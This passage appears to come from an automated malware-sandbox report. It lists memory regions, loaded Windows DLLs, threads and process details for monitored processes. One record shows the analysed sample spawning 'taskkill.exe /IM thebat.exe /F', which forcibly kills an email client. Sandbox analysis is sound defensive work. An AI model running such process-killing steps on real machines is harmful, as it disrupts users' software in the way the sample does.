"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2608 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2609 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2610 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2611 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2612 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2613 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2930 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2931 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2932 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2933 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2934 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2935 start_va = 0x160000 end_va = 0x163fff entry_point = 0x160000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2936 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2937 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2938 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2939 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2940 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2941 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2942 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2943 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2944 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2945 start_va = 0x7d0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2946 start_va = 0x1bd0000 end_va = 0x1c8ffff entry_point = 0x1bd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2947 start_va = 0x1cd0000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 2948 start_va = 0x1dc0000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 2949 start_va = 0x1e40000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 2950 start_va = 0x1f20000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 2951 start_va = 0x1fa0000 end_va = 0x226efff entry_point = 0x1fa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2952 start_va = 0x23d0000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 2953 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2954 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2955 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2956 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2957 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2958 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2959 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2960 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2961 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2962 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2963 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2964 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2965 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2966 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2967 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2968 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2969 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2970 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2971 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2972 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2973 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2974 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2975 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2976 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2977 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2978 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2979 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2980 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2981 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2982 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2983 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2984 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2985 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2986 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2987 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2988 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2989 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2990 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2991 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2992 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 239 os_tid = 0xc3c Thread: id = 261 os_tid = 0xcc8 Thread: id = 267 os_tid = 0xd04 Thread: id = 269 os_tid = 0xd0c Thread: id = 270 os_tid = 0xd10 Process: id = "36" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x24d1c000" os_pid = "0xc84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thebat.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2803 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2804 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2805 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2806 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2807 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2808 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2809 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2810 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2811 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2812 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2813 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2814 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2815 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2816 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2817 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3088 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3089 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3090 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3091 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3092 start_va = 0x170000 end_va = 0x173fff entry_point = 0x170000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 3093 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3094 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3095 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3096 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 3097 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3098 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3099 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3100 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3101 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 3102 start_va = 0x720000 end_va = 0x1b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3103 start_va = 0x1b20000 end_va = 0x1bdffff entry_point = 0x1b20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3104 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 3105 start_va = 0x1d00000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3106 start_va = 0x1de0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 3107 start_va = 0x1e60000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 3108 start_va = 0x1ee0000 end_va = 0x21aefff entry_point = 0x1ee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3109 start_va = 0x22f0000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 3110 start_va = 0x2480000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 3111 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3112 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3113 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3114 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3115 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3116 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3117 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3118 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3119 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3120 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3121 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3122 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3123 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3124 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3125 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3126 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3127 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3128 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3129 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3130 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3131 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3132 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3133 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3134 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3135 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3136 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3137 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3138 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3139 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3140 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3141 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3142 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3143 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3144 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3145 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3146 start_va = 0x7feff950000 